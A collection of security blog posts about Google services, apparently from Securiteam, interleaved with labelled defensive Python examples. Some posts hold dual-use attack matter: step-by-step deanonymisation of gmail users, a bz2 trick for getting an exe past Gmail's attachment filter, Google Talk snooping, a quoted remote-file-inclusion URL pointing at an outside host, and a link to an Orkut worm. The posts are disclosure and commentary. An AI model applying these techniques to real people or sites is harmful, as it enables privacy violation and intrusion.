The Internet May Harm your computer!

I have just Googled up some Securiteam pages. Can you imagine my shock when I saw the Google alert saying Securiteam can harm my computer?

Active Network Scanning Hacked

Isn’t that great?

Just before I pushed the panic button, I Googled up one more term.

This is what I got:
Site Google Hacked

When I saw this one, I relaxed.

On regular days when you see the message saying “This site may harm your computer” it means that google believes that this site may install malicious software on your computer.
Today Google’s Safe Browsing feature probably freaked out for some reason.

In any case, according to Google, the whole Internet can harm your computer right now, so be careful!

Update: Marissa Mayer wrote in the google blog that the problem happened because the URL of ‘/’ was mistakenly added to the ‘bad sites’ file and ‘/’ expands to all URLs. She also wrote that this problem started at 6:27 a.m. and ended at 7:25 a.m. PST.
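To show why a bare ‘/’ entry flags every URL, here is an added example (not Google's code, and not the real Safe Browsing list format) of a host-suffix/path-prefix blocklist matcher, together with the two pre-publication checks a list publisher would want: entry validation and a canary test against known-good URLs. The entry format, the list entries and the canary URLs are all assumptions constructed for illustration.

```python
"""Added example (not Google's code): a host-suffix/path-prefix blocklist
matcher that shows why a bare '/' entry flags every URL, plus two checks a
list publisher can run before deployment. The entry format is an assumption
made for illustration; all list entries and canary URLs are constructed."""
from urllib.parse import urlsplit

# Constructed "bad sites" entries, formatted as "host/path-prefix".
BAD_SITES_OK = ["badsite.example/", "cdn.example/malware/"]
BAD_SITES_BROKEN = BAD_SITES_OK + ["/"]          # the mistaken entry

# Constructed canaries: URLs that must never be flagged by a sane list.
CANARY_URLS = ["http://www.google.com/", "https://blogs.securiteam.com/"]


def split_entry(entry):
    """'host/path' -> (host, path); the bare entry '/' -> ('', '/')."""
    host, _, path = entry.partition("/")
    return host.lower(), "/" + path


def matches(url, entry):
    """Naive matcher: the URL host must end with the entry host and the URL
    path must start with the entry path. An empty entry host is a suffix of
    every host, so the entry '/' matches every URL: the failure in the post."""
    parts = urlsplit(url)
    host, path = split_entry(entry)
    return parts.netloc.lower().endswith(host) and (parts.path or "/").startswith(path)


def is_flagged(url, bad_sites):
    return any(matches(url, entry) for entry in bad_sites)


def invalid_entries(bad_sites):
    """Check 1: reject entries whose host part is empty or has no dot;
    such an entry matches far more than one site."""
    return [e for e in bad_sites
            if not split_entry(e)[0] or "." not in split_entry(e)[0]]


def canary_check(bad_sites, canaries=CANARY_URLS):
    """Check 2: a list that flags any known-good canary must not ship.
    Returns the canaries that were (wrongly) flagged."""
    return [u for u in canaries if is_flagged(u, bad_sites)]


def safe_to_publish(bad_sites):
    return not invalid_entries(bad_sites) and not canary_check(bad_sites)


if __name__ == "__main__":
    for name, lst in (("ok", BAD_SITES_OK), ("broken", BAD_SITES_BROKEN)):
        print(name, "flags google.com:", is_flagged("http://www.google.com/", lst),
              "| publishable:", safe_to_publish(lst))
```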


Gmail Attachment Filter

I ran across something interesting today. A friend asked me to send him a certain exe to his email. Not thinking much about it, I composed an email in my gmail, attached the exe, hit send and then saw an error which basically told me google doesn’t allow exes to be sent through gmail.

Irritating enough, but seemingly familiar, I decided to ‘get smart’ and zip the exe in a folder and send it. Same thing.

!@#$%

I also tried gzipping the archive and sending it.. didn’t work either.

I finally compressed the folder+exe to make a bz2 archive and sent it away. Worked like a charm.

Where was Google attachment filters then!? *grin*
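As an added example (not Google's code), here is the kind of content check a mail filter needs so that a renamed or re-wrapped archive does not slip past it: it identifies files by magic bytes rather than extension and follows the attachment through nested archive layers. A filter that opens only zip and gzip, as the post's experience suggests, misses an executable wrapped in bz2; the version with bz2 enabled catches it. The sample "executable" and archives are constructed in-line.

```python
"""Added example (not Google's code): magic-byte sniffing that follows an
attachment through nested archives. A filter that only opens zip and gzip
misses an executable inside a bz2 archive; enabling bz2 closes that gap.
Sample payloads are constructed; the 'exe' is an MZ header plus padding."""
import bz2
import gzip
import io
import zipfile

MAX_DEPTH = 4                 # guard against deeply nested archive bombs
MAX_BYTES = 8 * 1024 * 1024   # refuse to inflate anything larger than this

WEAK = frozenset({"zip", "gzip"})          # layers the post's filter seemed to open
FULL = frozenset({"zip", "gzip", "bz2"})   # add the layer it missed


def _unpack(data, handlers):
    """Yield the contents of one archive layer; yield nothing if data is not
    an archive type we are allowed to open. Detection is by magic bytes."""
    if "zip" in handlers and data.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.file_size <= MAX_BYTES:     # coarse size guard
                    yield zf.read(info)
    elif "gzip" in handlers and data.startswith(b"\x1f\x8b"):
        yield gzip.decompress(data)
    elif "bz2" in handlers and data.startswith(b"BZh"):
        yield bz2.decompress(data)


def contains_executable(data, handlers=FULL, depth=0):
    """True if a PE/DOS executable (leading 'MZ') is found at any archive
    depth the handlers can open; False if not found or nesting is too deep."""
    if data.startswith(b"MZ"):
        return True
    if depth >= MAX_DEPTH or len(data) > MAX_BYTES:
        return False
    return any(contains_executable(inner, handlers, depth + 1)
               for inner in _unpack(data, handlers))


# Constructed samples: an "exe" and the wrappings the post describes.
FAKE_EXE = b"MZ" + b"\x90" * 64


def zipped(name, payload):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


SAMPLES = {
    "tool.exe": FAKE_EXE,
    "tool.zip": zipped("tool.exe", FAKE_EXE),
    "tool.zip.gz": gzip.compress(zipped("tool.exe", FAKE_EXE)),
    "tool.zip.bz2": bz2.compress(zipped("tool.exe", FAKE_EXE)),
    "notes.txt.bz2": bz2.compress(b"just text, nothing executable"),
}


def scan(handlers=FULL):
    """Map each sample name to whether the filter would flag it."""
    return {name: contains_executable(data, handlers) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    print("weak filter:", scan(WEAK))
    print("full filter:", scan(FULL))
```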


Snoop on Google Talk (Wiretap)

Yes, snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting is that, unlike other chat clients like Skype, MSN and others, GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, which probably stems from the fact that Google supports web-based chat in a constantly refreshing web page (unlike MSN, which launches a separate window), allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing - basically never needing to log on/off on my PC/BlackBerry; they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection :D


Everything new is old again - Native Client

Google has garnered a lot of interest, over the past day or two, with its radically new idea, released under the name Native Client.  You can read the announcement at http://google-code-updates.blogspot.com/2008/12/native-client-technology-for-running.html or download the research paper (in PDF) at http://nativeclient.googlecode.com/svn/trunk/nacl/googleclient/native_client/documentation/nacl_paper.pdf
That idea sounded so familiar I just knew it had to have been done before.

It has.  It’s just a dressed up version of an activity monitor.  The oldest form of AV actually implemented.  In fact, it dates back to the days just slightly before the first PC viruses, when people were trying to prevent damage by some of the early PC trojans that were being shared on BBSes.

Or, if they take it far enough, and if you like, you can call it a form of virtual machine.  And we are back to http://blogs.securiteam.com/index.php/archives/1171


Hi Goog, where is your user agent?

Net Applications reported this week that one third of the traffic coming from Google’s facilities has no user agent. This report refers specifically to the traffic coming from Google’s employees and not the Search Engine’s traffic.
Vince Vizzaccaro, a senior executive from Net Applications, said that they had never seen an OS stripped off the user agent string before: “You have to arrange to have that happen, it’s not something we’ve seen before with a proxy server.”
So what’s Google hiding? Of course, Google, being Google, wouldn’t comment on rumors and speculation.

What do you think? Why would they hide their UA?


My Baby’s Birth

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine; it was used to hack a friend’s web site, so I took it upon myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what this site does to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)


Wired network compromised during the Google developer conference in Israel

Calcalist reports that the wired network in a recent google developers conference in Israel was hacked during the conference. I haven’t seen that report anywhere else, but the reporter Dora Kishinevski is fairly level headed with little tendency for sensational stories so I’m marking it as probably true.

According to the article, google sent a follow-up email to the participants and warned them the network was compromised. This is interesting first because the attack was on the wired and not the wireless Internet, which is considerably harder to do without being caught, and second because it reminds us how insecure gmail is over compromised lines (as opposed to, for example, a corporate VPN). I’m willing to bet close to 100% of the participants used gmail while at the google conference.

The article also quotes google as writing “We recommend you change your password, just in case, to any site you visited using the wired connection”. Definitely.


Who has the keys to your business?

SearchEngineJournal has a story about this guy who gave the keys to his business to Google. Well, not exactly the keys, but he used a Gmail account for all his business emails, and had used the same account for his Google Analytics, Webmaster Tools and his own Google Adsense account.
And then one day he woke up and found out that Google disabled his Google account.

google account disabled
From that moment on, not only did his Adsense income stop and he could no longer access any email he kept in his Gmail inbox, but all the emails sent to him by his customers were routed to a voided account.
I can’t even think how to start handling such a crisis. What do you do first? I have a few ideas but that’s for a different post.

What the hell was he thinking about when he gave Google the keys to his business?

If you still want to use a Google account for your business there are a few things you should do:
1. Make sure you backup your account on a regular basis.

2. Get your own domain and use Google Apps. This way, in case of emergency, you can change your MX records back to your original hosting within a few hours.

3. Never use your personal account for your Google Adwords.

4. Never use your personal account for your Google Analytics.

5. Never Ever use your personal account for your Google Adsense.

Don’t let them catch you unprepared.


Google: we will share your name with anyone who asks us for it

Here’s what happens when you try to bury a security vulnerability by fixing it silently and not telling anyone: all other similar vulnerabilities remain unfixed.

When I started a challenge yesterday to find a different way to find the full name behind a user’s gmail address I had a specific method in mind – a weakness in google docs that shows the full name of a person when you share a document (description and screen shots below). But it appears this problem is more widespread – it affects google maps, and perhaps other apps as well (there seems to be a difference between various localized versions of the google applications, so YMMV). Andre claims that he’d known about this for 2.5 years, and I wonder who else has known (spammers using this method to personalize the mails sent to gmail addresses?). All of this could have been prevented if google had come out with a simple advisory explaining the problem and their stand on it. If they had really wanted to fix it (and not just silence the press about the previous problem), people would have notified them about the other problems so that they could address them. Instead, they sent a PR drone to deny this is really a problem, while a programmer patched it without giving thought to the other google applications.

I’d be happy to hear from anyone on google’s security or development team – I promise to post their response verbatim and I’m curious to hear what they have to say. Notice, however, that I couldn’t care less about their PR response. If your position in google is marketing, don’t bother replying – this is a security issue and not a marketing issue – it’s time google addresses it for what it is.

And for those who were patient enough to go through my rant, here’s a step-by-step explanation provided by Vincent Claeys on how to reveal the real name behind the gmail address. Kudos to Naftali Shpitzer, Vincent Claeys and Andre Gironda for finding the way (and other ways I haven’t thought of…) to solve the problem.

1. Log in to your gmail account
2. Click documents on the left top
3. Create a presentation, save it, close it
4. In the list with presentations, select the presentation you just made
5. Click the “share” button
6. Type in the e-mail address of which you want to find out the real name
7. Click “invite” (I always use “as viewers”, but “as collaborators” will work as well I guess)
8. Click “skip sending invitation”
9. Click “ok” in the warning window
10. Click on the presentation to open it (a new window will open)
11. Click on the “share” tab on the right top corner
12. Read the real name of the person you invited :-)
13. Remove the invited person from the list again so he doesn’t notice anything when he logs into his gmail account :-)


How to find the real name behind the gmail address, round 2

As you can see from the comments in my previous post, google has fixed the google calendar problem that allowed gmail users to see other users’ full names. Obviously, many people are disappointed – that’s the downside of web services: once a vulnerability is fixed, it’s fixed for everyone, immediately :-)

But Yair, SEO expert by day and curious individual by night, told me about a different way to do the attack. This attack works on both gmail and google apps users, and is completely stealthy – unlike the google calendar attack that notifies the victim, this one can be conducted without them knowing.

So what should I do with this information? Contacting the google security team is like typing Shakespeare into /dev/null, as anyone who ever tried to report a security vulnerability to google probably knows – it’s amazing to see the difference between the hostile google security team and the Microsoft security team who is trying hard (sometimes a little too hard) to be researcher friendly. So contacting google security is pretty much not an option.

The other ‘default’ option is to go full disclosure. But in this case, disclosing a bug in google will result in them claiming the bug is actually a feature, and then fixing it silently without any acknowledgment while chanting softly: “There was no bug. These aren’t the droids you’re looking for. Move along”. None of you will get a chance to test it, because by the time you do the problem would be fixed and we have never been at war with Eurasia.

So how do I give the smart readers a chance to try it out without alerting the world media? Simple: I will give you a chance to try it out before I disclose it. A smart and energetic researcher should be able to find this bug based on the hints in this page. You might even find holes different from what Yair did. This should be fun…

To give the proper incentive, if you find the hole, try to get the full name of the gmail email metalolcats@gmail.com. Use the full name as a coupon code to get a free account on our vulnerability scanning service to scan your server from the Internet on an ongoing basis. Just sign up here and use the real name of the gmail user above as the coupon code. If you don’t have a server to scan for vulnerabilities or don’t feel like signing up, send me the answer to aviram at beyondsecurity.com and I will mention you on this page. But be quick, the google QA team may find it before you. When enough people find it, or google fixes it, I’ll publish the way along with some screenshots. That is, if the truth ministry doesn’t get to me first.

Oh, and the question you are all dying to ask – admin@gmail.com is no longer ’smart ass’. It’s now just boring old “Admin”, but then again it always has been.


gmail https - not for everyone

A few weeks ago, Google added an option to force your Gmail connection to https instead of http. This feature was great news for people like me who use public networks a lot.
I was looking for that feature in my settings page but couldn’t find anything that looks like it. I stopped looking for it and today when looking for something else, I found the reason why I didn’t get this feature.
I’m using Google Apps for my domain, and apparently my Google Apps account simply doesn’t have this feature. Only my Gmail account has it!

This is what the settings page of my Gmail account looks like:

This is what my Google Apps settings page looks like:

I can’t think of a good reason for Google to make a Google Apps account less secure than a Gmail account. I can only hope that it’s a matter of time and it is not one of those features that will never be included in Google Apps.

In any case, if you are using Google Apps you can still use a secured connection.
Instead of going to http://mail.google.com/a/your-domain , take your browser to https://mail.google.com/a/your-domain.
That will make your connection https instead of http.

Google has supported https for Gmail from day 1. The thing is, it was kind of a secret and if you didn’t look for it, or didn’t have somebody to tell you about it, you would still be using http. As a matter of fact, I doubt that more than a tiny fraction of Gmail users have ever heard of https and know whether it’s good or bad.

Security should be built over security awareness. Without awareness real security will never happen. Employees who write classified documents should be aware of the document classification they work on. It is not enough to tell them that their document is classified. They need to know about classification and think about classification and understand what classification means when dealing with it.
The same way that people know not to keep their ATM card PIN code in their wallet, (the bank helped them to raise their security awareness) Google must help their users raise their security awareness and know not only that https is available for Gmail but also that https is so much safer than http and should be used by default.

I doubt that the majority of people will ever use the secured connection for Gmail. Such a feature requires education and Google will never do that. Since https is significantly slower than http, and since most people don’t know about security and don’t really care about security, this feature is probably just another feature for the readers of this blog, and their family and friends.

Update: I checked the comment by ‘gmail corporate user’, and he is right. My gemstones shop uses the free version of Google Apps. The paid version has a feature called “SSL enforcement for secure HTTPS access” that is included in the paid version only (no. 4 in “Collaboration application features”). To be honest, I don’t think I have the right to complain about something I got for free. I also have customers that are paying for premium features that cost me nothing, features that are there just to make the customers upgrade to the Advanced Plan. I guess this is not a mistake and someone wants me to upgrade. Fair enough.


The Security Question Vulnerability

How easy is it to break into your Gmail account? How about Yahoo! Or Windows Live?
If you provided a truthful answer to the security question during signup, it is probably quite easy to hijack your account, with just a little bit of research.

Take a look at the Yahoo! Security Questions:

Yahoo Security Questions

Are these security questions?

Anyone that knows my address can easily figure out the name of my first school or my high school mascot. All of my neighbors, family and friends know both my dog’s name and my dad’s middle name, and everybody in the world knows I just LOVE the Lakers. As for my wife and me, the people who attended our wedding had the chance to hear about it in the ceremony - in case you couldn’t make it, we met on a roof of a bus, in Ladakh, India in 1994…

The fact that the answer to each of the security questions above is relatively easy to find out makes them a security vulnerability in my Yahoo! account.
By letting me make a security key based on the name of my first school, Yahoo! actually puts me at risk, allowing anyone that knows where I live to hijack my account. It’s like saying “We have the greatest lock to protect your house. Now, why don’t we hide the key under the mat”.

Windows Live is pretty much the same as Yahoo!:

windows live security questions
Gmail is a little bit more sophisticated with one major difference:
gmail security questions

Gmail is the only one of these three that allows you to choose your own question.
By letting you do that, Gmail asks “which question only you can answer?” I think that most people might still come up with “Who is my favorite singer”, “What is my date of birth” or “My dog’s name”.
However, that isn’t a security vulnerability encouraged by Google. If they give you the tools and you fail to use them, it’s not their fault.

So, what can we do about it?
If you can write your own question, that would be the best. If not, choose the question about the name of your first school and put your first phone number as the answer. That’s what I did! :)

Got better ideas? Share them with us!


Finding the name behind the gmail address

Ever wondered what name is behind some obscure gmail address? Maybe your preferred gmail address was taken and you’re wondering who took it?
Here’s a cute vulnerability in the gmail system that comes from the strong tie-ins between gmail, the google calendar and all the other services.

How to do it:

- Go to the ’share this calendar’ tab

- Enter the email address in the ‘person’ box

- Click ‘add person’ and ’save’

- When you return to this screen you will see the first and last name along with the gmail address

Screenshots:

I always wondered who was behind admin@gmail.com

Tell google you want to share your calendar and put their gmail email address

Oh, I guess they figured people like me would be interested…

admin@gmail.com is a smart ass

If you are getting personalized emails from spammers to your gmail account, here’s an idea on how they got your name.


Google as an RBL

For those not familiar with the term, RBL means Real-time Blackhole List; it is mainly used for fighting SPAM. I have recently started playing around with Google as an RBL engine; the idea is that if the search term I use returns too many hits, it is likely to be SPAM :)

The danger of course is that the term could be simply popular - but the trick here is that I’m using something very special as the search term - the IP address of the poster.

The IP address shouldn’t be popular; except for a few rare cases, IP addresses listed on Google are directly related to SPAM - either they are listed under wiki-like sites as being banned, or they appear as mass-comment posters. Simply put, if your IP is listed in Google you must be up to no good.

How good is this method? Nothing is bulletproof, but if you suspect something of being SPAM, put the IP in Google and see whether there are hits. Almost all the comment SPAM I filtered out this month had more than 100 hits in Google; all non-SPAM had either 0 hits or fewer than 10.

BTW: A good advantage of Google is that it is quick - a few seconds to get a response - a disadvantage is that you cannot just “hammer” them with searches or they will block you - maybe someone can pick up this idea and make an RBL from IP addresses using Google as a back-end.
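The hit-count heuristic above, as an added example (not the post's code): a small classifier with the post's own thresholds (more than 100 hits is SPAM, fewer than 10 is not, anything in between needs a look), a result cache so the same IP is not searched twice, and a minimum spacing between live queries so the search engine is not hammered. The search backend is injected; FakeSearch, FakeClock and the hit counts are constructed so the logic can be checked offline.

```python
"""Added example (not the post's code): the "search the poster's IP" idea as
a classifier with an injected search backend, a result cache and a query
spacing guard. Thresholds are the post's numbers (>100 hits: spam, <10: not
spam); FakeSearch, FakeClock and the hit counts are constructed."""
import ipaddress
import time

SPAM_HITS = 100   # more than this many hits: treat as spam
HAM_HITS = 10     # fewer than this many hits: treat as legitimate


class IpReputation:
    def __init__(self, hit_count, ttl=3600, min_interval=2.0, clock=time.monotonic):
        self.hit_count = hit_count        # callable(query) -> number of hits
        self.ttl = ttl                    # seconds a counted result stays fresh
        self.min_interval = min_interval  # minimum spacing between live queries
        self.clock = clock
        self._cache = {}                  # ip -> (hits, time counted)
        self._last_query = None

    def classify(self, ip):
        """Return 'spam', 'ham' or 'unknown' for a poster's IP address."""
        key = str(ipaddress.ip_address(ip))   # raises ValueError if not an IP
        now = self.clock()
        cached = self._cache.get(key)
        if cached is not None and now - cached[1] < self.ttl:
            hits = cached[0]
        elif self._last_query is not None and now - self._last_query < self.min_interval:
            return "unknown"   # back off rather than get blocked by the engine
        else:
            # Quote the address so the engine matches the literal dotted quad.
            hits = self.hit_count(f'"{key}"')
            self._last_query = now
            self._cache[key] = (hits, now)
        if hits > SPAM_HITS:
            return "spam"
        if hits < HAM_HITS:
            return "ham"
        return "unknown"   # popular for some other reason; needs a human look


class FakeSearch:
    """Stand-in for a search engine: canned hit counts, and it counts calls."""
    def __init__(self, counts):
        self.counts, self.calls = counts, 0

    def __call__(self, query):
        self.calls += 1
        return self.counts.get(query.strip('"'), 0)


class FakeClock:
    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t


# Constructed hit counts (documentation address ranges, not real posters).
COUNTS = {"198.51.100.7": 340, "203.0.113.9": 0, "192.0.2.44": 55}


def run_demo():
    clock, search = FakeClock(), FakeSearch(COUNTS)
    rep = IpReputation(search, clock=clock)
    out = {}
    for ip in COUNTS:                                # three live queries, 5 s apart
        out[ip] = rep.classify(ip)
        clock.t += 5
    out["cached"] = rep.classify("198.51.100.7")     # served from cache, no query
    out["spaced"] = rep.classify("198.51.100.8")     # new IP, interval respected
    out["too_fast"] = rep.classify("198.51.100.9")   # same instant: backed off
    return out, search.calls


if __name__ == "__main__":
    print(run_demo())
```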


When fixing is not enough

Howdy ho from Brazil, folks.

Remember that vulnerability in the Gmail filter feature reported by Petko D. Petkov in September? Google fixed this vulnerability a few days after it was disclosed, but something was missing: end users should have been notified about it.
Early this week I was made aware of someone who was hit hard by this vuln months after it was fixed. David Airey’s domain was hijacked and this vulnerability helped with that.

But Google fixed that, so what’s the problem? They should have notified all users about it. New filters could not be injected anymore after the fix, but filters injected before the fix were still there. A simple “please check your filters” Web two-dot-oh notice would be enough, only if new filters were added in the days between the disclosure of the vuln and the fix. End users don’t read the same blogs, lists and security resources that we read. Users are not supposed to know the nuts and bolts of the vulnerability, but they should know what manual actions should be taken.
I don’t know about you, but I thought about some solutions for that:

  1. Anything under settings should require password, in every change. I guess Yahoo! Mail works like that;
  2. Filters that forward messages should be handled in a different way, maybe under “Forwarding and POP/IMAP” tab.

Another simple mitigation action that people should use for any online service is something like a privilege separation (I don’t have a better name for that). Use different accounts for different purposes, have a master account and child accounts that forward every message to the master account.

If you are a moderator in a Yahoo! Group, don’t use your main personal profile for group management, for example. Reducing the lifetime of the session to 15 minutes and logging in only on trustworthy networks are other paranoid measures that could be considered. If there’s a targeted attack against your account, probably your less critical account will be affected.
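The “please check your filters” step, as an added example (not Google's code): an audit of an exported Gmail filter list that flags every filter forwarding mail elsewhere, and raises the severity when the target is a domain you do not control or when the same filter also trashes or archives the mail, which is what keeps a planted forwarding rule invisible to the owner. It assumes the export is an Atom feed whose entries carry apps:property name/value pairs (the shape of Gmail's Settings > Filters > Export); the feed, addresses and trusted domains are constructed.

```python
"""Added example (not Google's code): audit an exported Gmail filter list for
forwarding rules. Assumes the export is an Atom feed whose <entry> elements
carry apps:property name/value pairs (the shape of Settings > Filters >
Export); the feed, addresses and trusted domains below are constructed."""
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Constructed export: a benign labelling filter, a filter that quietly forwards
# and trashes sensitive mail, and a filter forwarding to the owner's own domain.
SAMPLE_EXPORT = """<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry><category term='filter'/><title>Mail Filter</title>
    <apps:property name='from' value='newsletter@example.com'/>
    <apps:property name='label' value='News'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry><category term='filter'/><title>Mail Filter</title>
    <apps:property name='hasTheWord' value='password OR domain OR transfer'/>
    <apps:property name='forwardTo' value='collector@mail.example.net'/>
    <apps:property name='shouldTrash' value='true'/>
  </entry>
  <entry><category term='filter'/><title>Mail Filter</title>
    <apps:property name='to' value='me@example.com'/>
    <apps:property name='forwardTo' value='backup@example.com'/>
  </entry>
</feed>"""

TRUSTED_FORWARD_DOMAINS = {"example.com"}   # constructed: domains you control


def parse_filters(xml_text):
    """Return each filter as a dict of its apps:property name -> value."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [{p.get("name"): p.get("value") for p in entry.iter(APPS + "property")}
            for entry in root.iter(ATOM + "entry")]


def audit(xml_text, trusted=TRUSTED_FORWARD_DOMAINS):
    """Flag every filter that forwards mail. Severity rises when the target
    domain is not one you control and when the filter also hides the mail
    (trash/archive), since the owner then never sees what was diverted."""
    findings = []
    for index, props in enumerate(parse_filters(xml_text), start=1):
        target = props.get("forwardTo")
        if not target:
            continue
        domain = target.rsplit("@", 1)[-1].lower()
        hides = props.get("shouldTrash") == "true" or props.get("shouldArchive") == "true"
        if domain not in trusted:
            severity = "critical" if hides else "high"
        else:
            severity = "medium" if hides else "info"
        findings.append({
            "filter": index, "forward_to": target, "hides_mail": hides,
            "severity": severity,
            "match": {k: v for k, v in props.items()
                      if k in ("from", "to", "subject", "hasTheWord")},
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORT):
        print(f"[{f['severity']}] filter #{f['filter']} forwards to {f['forward_to']} "
              f"(hides mail: {f['hides_mail']}) matching {f['match']}")
```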
Do you have any insight about this Gmail vuln? Comment.
More info:


Orkut virus/worm on the loose

An Orkut-based virus/worm appears to be on the loose; it propagates by posting notes on people’s scrapbooks. So chances are that if you got a new scrapbook item on your long-unused Orkut account, it is because the worm has infected one of your friends there.

The virus/worm uses javascript code to propagate. Its source can be found here: hxxp://files.myopera.com/virusdoorkut/files/virus.js
Update: Google apparently is actively deleting items from the scrapbook of people that were infected and that have infected others.

Update 2: More details can be found here: http://antrix.net/journal/techtalk/orkut_xss.html

